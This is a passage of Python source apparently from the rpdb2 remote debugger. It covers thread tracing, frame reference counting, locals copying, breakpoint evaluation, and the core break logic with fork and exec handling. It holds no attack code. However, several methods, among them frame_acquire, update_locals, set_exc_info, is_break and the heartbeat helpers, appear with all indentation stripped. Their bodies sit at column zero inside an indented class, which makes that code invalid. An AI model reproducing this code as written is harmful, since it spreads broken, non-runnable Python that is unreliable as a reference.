            except AttributeError:
                # m_frame is None: the outer-most frame just returned.
                if self.m_event != 'return' and self.m_core.m_ftrap:
                    #
                    # An exception is raised from the outer-most frame.
                    # This means an unhandled exception.
                    #
                    self.m_frame = frame
                    self.m_event = 'exception'
                    self.m_uef_lineno = self.m_ue_lineno
                    self.m_fUnhandledException = True
                    self.m_core._break(self, frame, event, arg)
                    self.m_uef_lineno = None
                if frame in self.m_locals_copy:
                    # Flush pending edits to locals before the frame dies.
                    self.update_locals()
                self.m_frame = None
                # Thread is done: unregister it and restore the bootstrap
                # trace function for any future calls on this thread.
                self.m_core.remove_thread(self.m_thread_id)
                sys.setprofile(None)
                sys.settrace(self.m_core.trace_dispatch_init)
                if self.m_frame_external_references == 0:
                    return
                #
                # Wait until no one references the frame object
                #
                try:
                    self.m_frame_lock.acquire()
                    while self.m_frame_external_references != 0:
                        safe_wait(self.m_frame_lock, 1.0)
                finally:
                    self.m_frame_lock.release()
def frame_acquire(self):
"""
Aquire a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references += 1
f = self.m_frame
if f is None:
raise ThreadDone
return f
finally:
self.m_frame_lock.release()
def frame_release(self):
"""
Release a reference to the frame.
"""
try:
self.m_frame_lock.acquire()
self.m_frame_external_references -= 1
if self.m_frame_external_references == 0:
self.m_frame_lock.notify()
finally:
self.m_frame_lock.release()
    def get_frame(self, base_frame, index, fException = False):
        """
        Get frame at index depth down the stack.
        Starting from base_frame return the index depth frame
        down the stack. If fException is True use the exception
        stack (traceback).
        Returns (frame, lineno); raises NoExceptionFound or InvalidFrame.
        """
        if fException:
            tb = get_traceback(base_frame, self)
            if tb is None:
                raise NoExceptionFound
            # Start from the innermost traceback frame.
            while tb.tb_next is not None:
                tb = tb.tb_next
            f = tb.tb_frame
        else:
            f = base_frame
        while f is not None:
            # Hide the debugger's import-wrapper frames from the user.
            if not g_fDebug and f.f_code.co_name == 'rpdb2_import_wrapper':
                f = f.f_back
                continue
            if index <= 0:
                break
            f = f.f_back
            index -= 1
        if (index < 0) or (f is None):
            raise InvalidFrame
        if (self.m_uef_lineno is not None) and (f.f_back is None):
            # Outermost frame during an unhandled exception: report the
            # recorded exception line instead of the frame's current line.
            lineno = self.m_uef_lineno
        else:
            lineno = f.f_lineno
        if fException:
            # Prefer the traceback's line number for the chosen frame.
            tb = get_traceback(base_frame, self)
            while tb is not None:
                if tb.tb_frame == f:
                    lineno = tb.tb_lineno
                    break
                tb = tb.tb_next
        return (f, lineno)
    def get_locals_copy(self, frame_index, fException, fReadOnly):
        """
        Get globals and locals of frame.
        A copy scheme is used for locals to work around a bug in
        Python 2.3 and 2.4 that prevents modifying the local dictionary.
        Returns (globals, locals_copy, original_locals_copy).
        """
        try:
            base_frame = self.frame_acquire()
            (f, lineno) = self.get_frame(base_frame, frame_index, fException)
            if fReadOnly:
                # Read-only access gets a detached snapshot of globals.
                gc = copy.copy(f.f_globals)
            else:
                gc = f.f_globals
            try:
                (lc, olc) = self.m_locals_copy[f]
            except KeyError:
                if f.f_code.co_name in [MODULE_SCOPE, MODULE_SCOPE2]:
                    # At module scope locals and globals are the same dict.
                    lc = gc
                    olc = gc
                else:
                    lc = copy.copy(f.f_locals)
                    olc = copy.copy(lc)
                if not fReadOnly:
                    # Remember the copies so edits can be written back, and
                    # keep tracing this frame to synchronize them.
                    self.m_locals_copy[f] = (lc, olc)
                    self.set_local_trace(f)
            return (gc, lc, olc)
        finally:
            # Drop local references to the frame before releasing it, so
            # profile() is not kept waiting by stale references.
            f = None
            base_frame = None
            self.frame_release()
def update_locals_copy(self):
"""
Update copy of locals with changes in locals.
"""
lct = self.m_locals_copy.get(self.m_frame, None)
if lct is None:
return
(lc, base) = lct
cr = copy.copy(self.m_frame.f_locals)
for k in cr:
if not k in base:
lc[k] = cr[k]
continue
if not cr[k] is base[k]:
lc[k] = cr[k]
def update_locals(self):
"""
Update locals with changes from copy of locals.
"""
lct = self.m_locals_copy.pop(self.m_frame, None)
if lct is None:
return
self.m_frame.f_locals.update(lct[0])
    def __eval_breakpoint(self, frame, bp):
        """
        Return True if the breakpoint is hit.
        """
        if not bp.m_fEnabled:
            return False
        # An empty conditional expression means an unconditional breakpoint.
        if bp.m_expr == '':
            return True
        try:
            if frame in self.m_locals_copy:
                # Use the debugger's working copy of locals so edits made
                # by the user while broken are visible to the condition.
                l = self.m_locals_copy[frame][0]
                v = eval(bp.m_code, frame.f_globals, l)
            else:
                v = eval(bp.m_code, frame.f_globals, frame.f_locals)
            return (v != False)
        except:
            # A broken condition must never crash the debuggee; treat any
            # evaluation error as "not hit".
            return False
    def set_local_trace(self, frame, fsignal_exception = False):
        """
        Set trace callback of frame.
        Specialized trace methods are selected here to save switching time
        during actual tracing.
        """
        if not self.m_core.m_ftrace:
            frame.f_trace = self.trace_dispatch_stop
            return
        if fsignal_exception:
            frame.f_trace = self.trace_dispatch_signal
            return
        code_context = self.m_core.get_code_context(frame)
        # Order matters: a pending break wins over exception trapping,
        # which wins over per-function breakpoints and step bookkeeping.
        if self.m_core.is_break(self, frame):
            frame.f_trace = self.trace_dispatch_break
        elif code_context.m_fExceptionTrap or (frame.f_back is None):
            frame.f_trace = self.trace_dispatch_trap
        elif frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
            frame.f_trace = self.trace_dispatch
        elif frame in self.m_locals_copy:
            frame.f_trace = self.trace_dispatch
        elif frame == self.m_core.m_return_frame:
            frame.f_trace = self.trace_dispatch
        else:
            # Nothing interesting can happen in this frame: stop tracing it.
            del frame.f_trace
    def set_tracers(self, fsignal_exception = False):
        """
        Set trace callbacks for all frames in stack.
        """
        try:
            try:
                f = self.frame_acquire()
                while f is not None:
                    self.set_local_trace(f, fsignal_exception)
                    f = f.f_back
            except ThreadDone:
                # Thread went away while walking its stack; nothing to do.
                f = None
        finally:
            # Drop the frame reference before releasing.
            f = None
            self.frame_release()
    def trace_dispatch_stop(self, frame, event, arg):
        """
        Disable tracing for this thread.
        """
        if frame in self.m_locals_copy:
            # Flush any user edits of locals before tracing goes away.
            self.update_locals()
        sys.settrace(None)
        sys.setprofile(None)
        return None
    def trace_dispatch_break(self, frame, event, arg):
        """
        Trace method for breaking a thread.
        """
        if event not in ['line', 'return', 'exception']:
            return frame.f_trace
        if event == 'exception':
            self.set_exc_info(arg)
        self.m_event = event
        if frame in self.m_locals_copy:
            self.update_locals_copy()
        self.m_core._break(self, frame, event, arg)
        if frame in self.m_locals_copy:
            # Write back user edits and re-select the trace method for
            # this frame after the break.
            self.update_locals()
            self.set_local_trace(frame)
        return frame.f_trace
    def trace_dispatch_call(self, frame, event, arg):
        """
        Initial trace method for thread.
        """
        if not self.m_core.m_ftrace:
            return self.trace_dispatch_stop(frame, event, arg)
        self.m_depth += 1
        if self.m_depth > g_recursionlimit:
            # Too deep: let the profiler-based recursion handler take over.
            sys.setprofile(self.profile_recursion)
        self.m_frame = frame
        try:
            self.m_code_context = self.m_core.m_code_contexts[frame.f_code]
        except KeyError:
            self.m_code_context = self.m_core.get_code_context(frame)
        if self.m_core.m_fBreak or (self.m_core.m_step_tid == self.m_thread_id):
            self.m_event = event
            self.m_core._break(self, frame, event, arg)
            if frame in self.m_locals_copy:
                self.update_locals()
                self.set_local_trace(frame)
            return frame.f_trace
        if not frame.f_code.co_name in self.m_bp_manager.m_break_points_by_function:
            # No breakpoint can be hit in this function: stop tracing it.
            return None
        bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
        if bp is not None and self.__eval_breakpoint(frame, bp):
            self.m_event = event
            self.m_core._break(self, frame, event, arg)
            if frame in self.m_locals_copy:
                self.update_locals()
                self.set_local_trace(frame)
            return frame.f_trace
        return self.trace_dispatch
    def trace_dispatch(self, frame, event, arg):
        """
        General trace method for thread.
        """
        if (event == 'line'):
            if frame in self.m_locals_copy:
                self.update_locals_copy()
            bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
            if bp is not None and self.__eval_breakpoint(frame, bp):
                self.m_event = event
                self.m_core._break(self, frame, event, arg)
                if frame in self.m_locals_copy:
                    self.update_locals()
                    self.set_local_trace(frame)
            return frame.f_trace
        if event == 'return':
            if frame in self.m_locals_copy:
                self.update_locals_copy()
            if frame == self.m_core.m_return_frame:
                self.m_event = event
                self.m_core._break(self, frame, event, arg)
                if frame in self.m_locals_copy:
                    self.update_locals()
            # Frame is exiting; no further tracing of it is needed.
            return None
        if event == 'exception':
            if frame in self.m_locals_copy:
                self.update_locals()
                self.set_local_trace(frame)
            if not is_py3k() and not frame.f_exc_traceback is arg[2]:
                # Python 2: keep the frame's f_exc_* attributes in sync.
                (frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
            return frame.f_trace
        return frame.f_trace
    def trace_dispatch_trap(self, frame, event, arg):
        """
        Trace method used for frames in which unhandled exceptions
        should be caught.
        """
        if (event == 'line'):
            self.m_event = event
            if frame in self.m_locals_copy:
                self.update_locals_copy()
            bp = self.m_code_context.m_file_breakpoints.get(frame.f_lineno, None)
            if bp is not None and self.__eval_breakpoint(frame, bp):
                self.m_core._break(self, frame, event, arg)
                if frame in self.m_locals_copy:
                    self.update_locals()
                    self.set_local_trace(frame)
            return frame.f_trace
        if event == 'return':
            last_event = self.m_event
            self.m_event = event
            if frame in self.m_locals_copy:
                self.update_locals_copy()
            if frame == self.m_core.m_return_frame:
                self.m_core._break(self, frame, event, arg)
                if frame in self.m_locals_copy:
                    self.update_locals()
            if last_event == 'exception':
                # Preserve the 'exception' event across the return that
                # is generated while the stack unwinds.
                self.m_event = last_event
            return None
        if event == 'exception':
            self.m_event = event
            if self.m_code_context.m_fExceptionTrap and self.m_core.m_ftrap:
                # This frame traps unhandled exceptions: record and break.
                self.set_exc_info(arg)
                self.m_fUnhandledException = True
                self.m_core._break(self, frame, event, arg)
                if frame in self.m_locals_copy:
                    self.update_locals()
                return frame.f_trace
            # Remember where the exception surfaced in this frame.
            self.m_ue_lineno = frame.f_lineno
            if frame in self.m_locals_copy:
                self.update_locals()
                self.set_local_trace(frame)
            if is_py3k():
                self.set_exc_info(arg)
            elif not frame.f_exc_traceback is arg[2]:
                (frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback) = arg
            return frame.f_trace
        return frame.f_trace
    def trace_dispatch_signal(self, frame, event, arg):
        """
        Trace method installed by set_local_trace() when
        fsignal_exception is set; records the exception, restores the
        normal tracers, and delegates to the trap dispatcher.
        """
        #print_debug('*** trace_dispatch_signal %s, %s, %s' % (frame.f_lineno, event, repr(arg)))
        self.set_exc_info(arg)
        self.set_tracers()
        self.set_depth(frame)
        sys.setprofile(self.profile)
        return self.trace_dispatch_trap(frame, event, arg)
def set_exc_info(self, arg):
"""
Set exception information.
"""
if arg == None:
return
if is_py3k():
self.m_exc_info = arg
return
(t, v, tb) = arg
while tb is not None:
f = tb.tb_frame
f.f_exc_type = t
f.f_exc_value = v
f.f_exc_traceback = tb
tb = tb.tb_next
def get_exc_info(self):
return self.m_exc_info
def reset_exc_info(self):
self.m_exc_info = None
    def is_breakpoint(self):
        """
        Calc if current line is hit by breakpoint.
        """
        bp = self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
        if bp is not None and self.__eval_breakpoint(self.m_frame, bp):
            return True
        return False
    def get_breakpoint(self):
        """
        Return current line breakpoint if any.
        """
        # Unlike is_breakpoint(), the breakpoint's conditional expression
        # is NOT evaluated here; the raw breakpoint object is returned.
        return self.m_code_context.m_file_breakpoints.get(self.m_frame.f_lineno, None)
class CDebuggerCore:
    """
    Base class for the debugger.
    Handles basic debugger functionality.
    """
    def __init__(self, fembedded = False):
        # Master switch: tracing is active while this is True.
        self.m_ftrace = True
        # Per-thread context (CDebuggerCoreThread) of the thread in focus.
        self.m_current_ctx = None
        self.m_f_first_to_break = True
        self.m_f_break_on_init = False
        self.m_builtins_hack = None
        # Timer that releases an embedded debuggee waiting for a client.
        self.m_timer_embedded_giveup = None
        self.m_threads_lock = threading.Condition()
        # thread id -> per-thread debugger context.
        self.m_threads = {}
        self.m_event_dispatcher = CEventDispatcher()
        self.m_state_manager = CStateManager(STATE_RUNNING, self.m_event_dispatcher)
        self.m_ffork_into_child = False
        self.m_ffork_auto = False
        self.m_fsynchronicity = True
        self.m_ftrap = True
        self.m_fUnhandledException = False
        # Cached "state is broken" flag, read on the tracing path.
        self.m_fBreak = False
        self.m_lastest_event = None
        # step/next/return bookkeeping.
        self.m_step_tid = None
        self.m_next_frame = None
        self.m_return_frame = None
        self.m_saved_step = (None, None, None)
        self.m_saved_next = None
        self.m_bp_manager = CBreakPointsManager()
        self.m_code_contexts = {None: None}
        self.m_fembedded = fembedded
        self.m_embedded_event = threading.Event()
        self.m_embedded_sync_t0 = 0
        self.m_embedded_sync_t1 = 0
        # client id -> time of last heartbeat; key 0 is a placeholder
        # entry that keeps the debugger alive for an hour until a first
        # real client attaches.
        self.m_heartbeats = {0: time.time() + 3600}
    def shutdown(self):
        """Shut down the event dispatcher and the state manager."""
        self.m_event_dispatcher.shutdown()
        self.m_state_manager.shutdown()
    def is_embedded(self):
        """Return True if the debugger runs in an embedded interpreter."""
        return self.m_fembedded
    def send_fork_switch(self, sync_n):
        """
        Notify client that debuggee is forking and that it should
        try to reconnect to the child.
        """
        print_debug('Sending fork switch event')
        event = CEventForkSwitch(sync_n)
        self.m_event_dispatcher.fire_event(event)
    def send_exec_switch(self, sync_n):
        """
        Notify client that debuggee is doing an exec and that it should
        try to reconnect (in case the exec failed).
        """
        print_debug('Sending exec switch event')
        event = CEventExecSwitch(sync_n)
        self.m_event_dispatcher.fire_event(event)
    def send_event_exit(self):
        """
        Notify client that the debuggee is shutting down.
        """
        event = CEventExit()
        self.m_event_dispatcher.fire_event(event)
    def send_events(self, event):
        # No-op hook; overridden by CDebuggerEngine to broadcast the
        # full debugger state.
        pass
    def set_request_go_timer(self, timeout):
        """
        Set timeout thread to release debugger from waiting for a client
        to attach.
        """
        self.cancel_request_go_timer()
        if timeout is None:
            return
        # Enforce a minimum wait of one second.
        _timeout = max(1.0, timeout)
        f = lambda: (
            self.record_client_heartbeat(0, False, True),
            self.request_go()
        )
        self.m_timer_embedded_giveup = threading.Timer(_timeout, f)
        self.m_timer_embedded_giveup.start()
        #
        # sleep() releases control and allow timer thread to actually start
        # before this scope returns.
        #
        time.sleep(0.1)
    def cancel_request_go_timer(self):
        """Cancel the give-up timer if one is pending."""
        t = self.m_timer_embedded_giveup
        if t is not None:
            self.m_timer_embedded_giveup = None
            t.cancel()
    def setbreak(self, f):
        """
        Set thread to break on next statement.
        """
        if not self.m_ftrace:
            return
        tid = thread.get_ident()
        if not tid in self.m_threads:
            # Thread not yet traced: start tracing it instead.
            return self.settrace(f)
        ctx = self.m_threads[tid]
        f.f_trace = ctx.trace_dispatch_break
        # Remember the previous 'next' target so it can be restored.
        self.m_saved_next = self.m_next_frame
        self.m_next_frame = f
    def settrace(self, f = None, f_break_on_init = True, timeout = None, builtins_hack = None):
        """
        Start tracing mechanism for thread.
        """
        if not self.m_ftrace:
            return
        tid = thread.get_ident()
        if tid in self.m_threads:
            # Already tracing this thread.
            return
        self.set_request_go_timer(timeout)
        self.m_f_break_on_init = f_break_on_init
        self.m_builtins_hack = builtins_hack
        # New threads pick up tracing via threading.settrace(); the
        # current thread via sys.settrace().
        threading.settrace(self.trace_dispatch_init)
        sys.settrace(self.trace_dispatch_init)
        if f is not None:
            f.f_trace = self.trace_dispatch_init
    def stoptrace(self):
        """
        Stop tracing mechanism.
        """
        global g_fignore_atexit
        g_fignore_atexit = True
        threading.settrace(None)
        sys.settrace(None)
        sys.setprofile(None)
        self.m_ftrace = False
        # With m_ftrace False, per-frame tracers switch to
        # trace_dispatch_stop (see set_local_trace).
        self.set_all_tracers()
        try:
            self.request_go()
        except DebuggerNotBroken:
            pass
        #self.m_threads = {}
    def get_code_context(self, frame):
        """Return (and cache) the CCodeContext for frame's code object."""
        try:
            return self.m_code_contexts[frame.f_code]
        except KeyError:
            if self.m_builtins_hack != None:
                if calc_frame_path(frame) == self.m_builtins_hack:
                    # One-shot: install g_builtins_module as the target
                    # module's __builtins__.
                    self.m_builtins_hack = None
                    frame.f_globals['__builtins__'] = g_builtins_module
            code_context = CCodeContext(frame, self.m_bp_manager)
            return self.m_code_contexts.setdefault(frame.f_code, code_context)
def get_current_ctx(self):
if len(self.m_threads) == 0:
raise NoThreads
return self.m_current_ctx
def get_ctx(self, tid):
ctx = self.m_threads.get(tid, None)
if ctx == None:
raise ThreadNotFound
return ctx
    def wait_for_first_thread(self):
        """
        Wait until at least one debuggee thread is alive.
        Python can have 0 threads in some circumstances as
        embedded Python and the Python interpreter console.
        """
        if self.m_current_ctx is not None:
            return
        try:
            self.m_threads_lock.acquire()
            # Re-check under the lock; woken spuriously or on timeout.
            while self.m_current_ctx is None:
                safe_wait(self.m_threads_lock, 1.0)
        finally:
            self.m_threads_lock.release()
    def notify_first_thread(self):
        """
        Notify that first thread is available for tracing.
        """
        try:
            self.m_threads_lock.acquire()
            self.m_threads_lock.notify()
        finally:
            self.m_threads_lock.release()
    def set_exception_trap_frame(self, frame):
        """
        Set trap for unhandled exceptions in relevant frame.
        """
        # Walk outwards until a frame qualifies as a trap frame.
        while frame is not None:
            code_context = self.get_code_context(frame)
            if code_context.is_exception_trap_frame():
                code_context.m_fExceptionTrap = True
                return
            frame = frame.f_back
    def __set_signal_handler(self):
        """
        Set rpdb2 to wrap all signal handlers.
        """
        for key, value in list(vars(signal).items()):
            if not key.startswith('SIG') or key in ['SIG_IGN', 'SIG_DFL', 'SIGRTMIN', 'SIGRTMAX']:
                continue
            handler = signal.getsignal(value)
            if handler in [signal.SIG_IGN, signal.SIG_DFL]:
                continue
            try:
                # Re-install the existing handler; presumably this routes
                # it through rpdb2's signal wrapper installed elsewhere —
                # TODO confirm against the module's signal hooks.
                signal.signal(value, handler)
            except:
                print_debug('Failed to set signal handler for signal %s(%d)' % (key, value))
    def clear_source_cache(self):
        """Drop cached source lines and tell clients to do the same."""
        g_lines_cache.clear()
        event = CEventClearSourceCache()
        self.m_event_dispatcher.fire_event(event)
    def trace_dispatch_init(self, frame, event, arg):
        """
        Initial tracing method.

        First trace callback seen by a newly traced thread; creates the
        per-thread context and hands off to its specialized dispatchers.
        """
        if event not in ['call', 'line', 'return']:
            return None
        code_context = self.get_code_context(frame)
        if event == 'call' and code_context.is_untraced():
            return None
        self.set_exception_trap_frame(frame)
        try:
            t = current_thread()
            name = thread_get_name(t)
        except:
            name = ''
        if name == 'MainThread':
            self.__set_signal_handler()
        ctx = CDebuggerCoreThread(name, self, frame, event)
        ctx.set_tracers()
        try:
            self.m_threads_lock.acquire()
            self.m_threads[ctx.m_thread_id] = ctx
            nthreads = len(self.m_threads)
            if nthreads == 1:
                self.prepare_embedded_sync()
        finally:
            self.m_threads_lock.release()
        if nthreads == 1:
            # First thread: reset caches, focus it, and wake waiters.
            self.clear_source_cache()
            self.m_current_ctx = ctx
            self.notify_first_thread()
            if self.m_f_break_on_init:
                self.m_f_break_on_init = False
                self.request_break()
        # From now on this thread uses the per-thread dispatchers.
        sys.settrace(ctx.trace_dispatch_call)
        sys.setprofile(ctx.profile)
        self.wait_embedded_sync(nthreads == 1)
        if event == 'call':
            return ctx.trace_dispatch_call(frame, event, arg)
        elif hasattr(frame, 'f_trace') and (frame.f_trace is not None):
            return frame.f_trace(frame, event, arg)
        else:
            return None
    def prepare_embedded_sync(self):
        # Called under m_threads_lock when the first thread appears.
        if not self.m_fembedded:
            return
        t = time.time()
        t0 = self.m_embedded_sync_t0
        if t0 != 0:
            # Compensate heartbeats for the time no thread was running.
            self.fix_heartbeats(t - t0)
        if self.get_clients_attached() == 0:
            return
        if t - t0 < EMBEDDED_SYNC_THRESHOLD:
            return
        self.m_embedded_sync_t1 = t
        self.m_embedded_event.clear()
    def wait_embedded_sync(self, ftrigger):
        # Give an attached client a chance to resync after the embedded
        # interpreter was idle; no-op outside embedded mode.
        if not self.m_fembedded:
            return
        t = time.time()
        t0 = self.m_embedded_sync_t0
        t1 = self.m_embedded_sync_t1
        if t - t0 < EMBEDDED_SYNC_THRESHOLD:
            return
        if t - t1 >= EMBEDDED_SYNC_TIMEOUT:
            return
        if ftrigger:
            event = CEventEmbeddedSync()
            self.m_event_dispatcher.fire_event(event)
        safe_wait(self.m_embedded_event, EMBEDDED_SYNC_TIMEOUT - (t - t1))
        if ftrigger:
            self.m_embedded_sync_t1 = 0
    def embedded_sync(self):
        # Client acknowledged the embedded-sync event; release waiters.
        self.m_embedded_event.set()
    def set_all_tracers(self):
        """
        Set trace methods for all frames of all threads.
        """
        for ctx in list(self.m_threads.values()):
            ctx.set_tracers()
    def remove_thread(self, thread_id):
        """Forget a finished thread; refocus on another thread if needed."""
        try:
            del self.m_threads[thread_id]
            if self.m_current_ctx.m_thread_id == thread_id:
                self.m_current_ctx = list(self.m_threads.values())[0]
        except (KeyError, IndexError):
            # Last thread is gone: remember when, for embedded resync.
            self.m_embedded_sync_t0 = time.time()
    def set_break_flag(self):
        # Cache broken-ness as a plain flag, read on the tracing path
        # (see trace_dispatch_call) without taking the state lock.
        self.m_fBreak = (self.m_state_manager.get_state() == STATE_BROKEN)
def is_break(self, ctx, frame, event = None):
if self.m_fBreak:
return True
if ctx.m_fUnhandledException:
return True
if self.m_step_tid == ctx.m_thread_id:
return True
if self.m_next_frame == frame:
return True
if (self.m_return_frame == frame) and (event == 'return'):
return True
return False
def record_client_heartbeat(self, id, finit, fdetach):
"""
Record that client id is still attached.
"""
if finit:
self.m_heartbeats.pop(0, None)
if fdetach:
self.m_heartbeats.pop(id, None)
return
if finit or id in self.m_heartbeats:
self.m_heartbeats[id] = time.time()
def fix_heartbeats(self, missing_pulse):
for k, v in list(self.m_heartbeats.items()):
self.m_heartbeats[k] = v + missing_pulse
def get_clients_attached(self):
n = 0
t = time.time()
for v in list(self.m_heartbeats.values()):
if t < v + HEARTBEAT_TIMEOUT:
n += 1
return n
def is_waiting_for_attach(self):
if self.get_clients_attached() != 1:
return False
if list(self.m_heartbeats.keys()) != [0]:
return False
return True
    def _break(self, ctx, frame, event, arg):
        """
        Main break logic.

        Called from the per-thread trace dispatchers; decides whether to
        actually pause, records break state, handles fork/exec
        hand-over, notifies clients, and blocks until the debugger is
        resumed.
        """
        global g_fos_exit
        global g_module_main
        # Re-check under current conditions; another thread may already
        # have resumed the debugger.
        if not self.is_break(ctx, frame, event) and not ctx.is_breakpoint():
            ctx.set_tracers()
            return
        ctx.m_fBroken = True
        f_full_notification = False
        f_uhe_notification = False
        step_tid = self.m_step_tid
        try:
            self.m_state_manager.acquire()
            if self.m_state_manager.get_state() != STATE_BROKEN:
                self.set_break_dont_lock()
            if g_module_main == -1:
                # Lazily resolve the debuggee's __main__ module.
                try:
                    g_module_main = sys.modules['__main__']
                except:
                    g_module_main = None
            if not is_py3k() and not frame.f_exc_traceback is None:
                ctx.set_exc_info((frame.f_exc_type, frame.f_exc_value, frame.f_exc_traceback))
            if is_py3k() and ctx.get_exc_info() == None and sys.exc_info()[2] != None:
                ctx.set_exc_info(sys.exc_info())
            try:
                t = current_thread()
                ctx.m_thread_name = thread_get_name(t)
            except:
                pass
            if ctx.m_fUnhandledException and not self.m_fUnhandledException:
                self.m_fUnhandledException = True
                f_uhe_notification = True
            if self.is_auto_fork_first_stage(ctx.m_thread_id):
                # Save step state so it can be restored after the fork.
                self.m_saved_step = (self.m_step_tid, self.m_saved_next, self.m_return_frame)
                self.m_saved_next = None
                self.m_bp_manager.m_fhard_tbp = True
            if self.m_f_first_to_break or (self.m_current_ctx == ctx):
                # This thread takes (or keeps) the focus; clear the
                # one-shot step/next/return targets.
                self.m_current_ctx = ctx
                self.m_lastest_event = event
                self.m_step_tid = None
                self.m_next_frame = None
                self.m_return_frame = None
                self.m_saved_next = None
                self.m_bp_manager.del_temp_breakpoint(breakpoint = ctx.get_breakpoint())
                self.m_f_first_to_break = False
                f_full_notification = True
        finally:
            self.m_state_manager.release()
        ffork_second_stage = self.handle_fork(ctx)
        self.handle_exec(ctx)
        if self.is_auto_fork_first_stage(ctx.m_thread_id):
            self.request_go_quiet()
        elif self.m_ffork_auto and ffork_second_stage:
            # Restore step state saved at the first fork stage.
            (self.m_step_tid, self.m_next_frame, self.m_return_frame) = self.m_saved_step
            self.m_saved_step = (None, None, None)
            self.m_bp_manager.m_fhard_tbp = False
            self.request_go_quiet()
        elif self.get_clients_attached() == 0:
            #print_debug('state: %s' % self.m_state_manager.get_state())
            # Nobody is listening: do not stay broken.
            self.request_go_quiet()
        elif step_tid == ctx.m_thread_id and frame.f_code.co_name == 'rpdb2_import_wrapper':
            # Never present the debugger's own import wrapper to the user.
            self.request_step_quiet()
        else:
            if f_full_notification:
                self.send_events(None)
            else:
                self.notify_thread_broken(ctx.m_thread_id, ctx.m_thread_name)
                self.notify_namespace()
            if f_uhe_notification:
                self.send_unhandled_exception_event()
            # Block this thread until the debugger is resumed.
            state = self.m_state_manager.wait_for_state([STATE_RUNNING])
        self.prepare_fork_step(ctx.m_thread_id)
        self.prepare_exec_step(ctx.m_thread_id)
        ctx.m_fUnhandledException = False
        ctx.m_fBroken = False
        ctx.set_tracers()
        ctx.reset_exc_info()
        if g_fos_exit:
            # A client requested debuggee shutdown while broken.
            g_fos_exit = False
            self.send_event_exit()
            time.sleep(1.0)
            self.stoptrace()
    def is_auto_fork_first_stage(self, tid):
        """
        Return True while in the first stage of an auto-handled fork:
        the forking thread is known (g_forktid) but the pre-fork pid has
        not been recorded yet (see prepare_fork_step).
        """
        if not self.m_ffork_auto:
            return False
        return tid == g_forktid and g_forkpid == None
    def prepare_fork_step(self, tid):
        """Arrange to regain control right after thread tid calls fork()."""
        global g_forkpid
        global g_ignore_broken_pipe
        if tid != g_forktid:
            return
        # Single-step the forking thread so the debugger breaks again
        # immediately after the fork.
        self.m_step_tid = tid
        g_forkpid = os.getpid()
        if not self.m_ffork_into_child:
            return
        # Following the child: tell clients to reconnect and shut the
        # server down in this (parent) process.
        n = self.get_clients_attached()
        self.send_fork_switch(n)
        time.sleep(0.5)
        g_server.shutdown()
        CThread.joinAll()
        g_ignore_broken_pipe = time.time()
    def handle_fork(self, ctx):
        """
        Post-fork handling for thread ctx. Returns True on the side of
        the fork where debugging continues, False on the side where
        tracing is stopped.
        """
        global g_forktid
        global g_forkpid
        tid = ctx.m_thread_id
        if g_forkpid == None or tid != g_forktid:
            return False
        # Consume the pending-fork markers.
        forkpid = g_forkpid
        g_forkpid = None
        g_forktid = None
        if os.getpid() == forkpid:
            #
            # Parent side of fork().
            #
            if not self.m_ffork_into_child:
                #CThread.clearJoin()
                #g_server.jumpstart()
                return True
            self.stoptrace()
            return False
        #
        # Child side of fork().
        #
        if not self.m_ffork_into_child:
            self.stoptrace()
            return False
        # Only the forking thread survives fork(); restart the server.
        self.m_threads = {tid: ctx}
        CThread.clearJoin()
        g_server.jumpstart()
        return True
    def prepare_exec_step(self, tid):
        """Arrange to regain control if the pending exec() in thread tid fails."""
        global g_execpid
        if tid != g_exectid:
            return
        # Single-step the exec'ing thread and remember the pid.
        self.m_step_tid = tid
        g_execpid = os.getpid()
        # Tell clients to reconnect (in case the exec fails) and shut
        # the server down in this process.
        n = self.get_clients_attached()
        self.send_exec_switch(n)
        time.sleep(0.5)
        g_server.shutdown()
        CThread.joinAll()
    def handle_exec(self, ctx):
        """Recover after a failed exec(); returns True if recovery ran."""
        global g_exectid
        global g_execpid
        tid = ctx.m_thread_id
        if g_execpid == None or tid != g_exectid:
            return False
        g_execpid = None
        g_exectid = None
        #
        # If we are here it means that the exec failed.
        # Jumpstart the debugger to allow debugging to continue.
        #
        CThread.clearJoin()
        g_server.jumpstart()
        return True
    def notify_thread_broken(self, tid, name):
        """
        Notify that thread (tid) has broken.
        This notification is sent for each thread that breaks after
        the first one.
        """
        _event = CEventThreadBroken(tid, name)
        self.m_event_dispatcher.fire_event(_event)
    def notify_namespace(self):
        """
        Notify that a namespace update query should be done.
        """
        _event = CEventNamespace()
        self.m_event_dispatcher.fire_event(_event)
    def get_state(self):
        """Return the current debugger state."""
        return self.m_state_manager.get_state()
    def verify_broken(self):
        """Raise DebuggerNotBroken unless the debuggee is currently paused."""
        if self.m_state_manager.get_state() != STATE_BROKEN:
            raise DebuggerNotBroken
    def get_current_filename(self, frame_index, fException):
        """
        Return path of sources corresponding to the frame at depth
        'frame_index' down the stack of the current thread.
        """
        ctx = self.get_current_ctx()
        try:
            f = None
            base_frame = ctx.frame_acquire()
            (f, frame_lineno) = ctx.get_frame(base_frame, frame_index, fException)
            frame_filename = calc_frame_path(f)
            return frame_filename
        finally:
            # Drop frame references before releasing, so this scope does
            # not keep frames alive.
            f = None
            base_frame = None
            ctx.frame_release()
    def get_threads(self):
        """Return the thread-id -> context mapping (the live dict, not a copy)."""
        return self.m_threads
    def set_break_dont_lock(self):
        # Caller must already hold the state manager lock (fLock=False).
        self.m_f_first_to_break = True
        self.m_state_manager.set_state(STATE_BROKEN, fLock = False)
        self.set_break_flag()
        self.set_all_tracers()
    def request_break(self):
        """
        Ask debugger to break (pause debuggee).
        """
        if len(self.m_threads) == 0:
            # Nothing to break yet; wait for a debuggee thread first.
            self.wait_for_first_thread()
        try:
            self.m_state_manager.acquire()
            if self.m_state_manager.get_state() == STATE_BROKEN:
                return
            self.set_break_dont_lock()
        finally:
            self.m_state_manager.release()
        self.send_events(None)
    def request_go_quiet(self, fLock = True):
        """Like request_go() but silently ignore DebuggerNotBroken."""
        try:
            self.request_go(fLock)
        except DebuggerNotBroken:
            pass
    def request_go(self, fLock = True):
        """
        Let debugger run.
        """
        try:
            if fLock:
                self.m_state_manager.acquire()
            self.verify_broken()
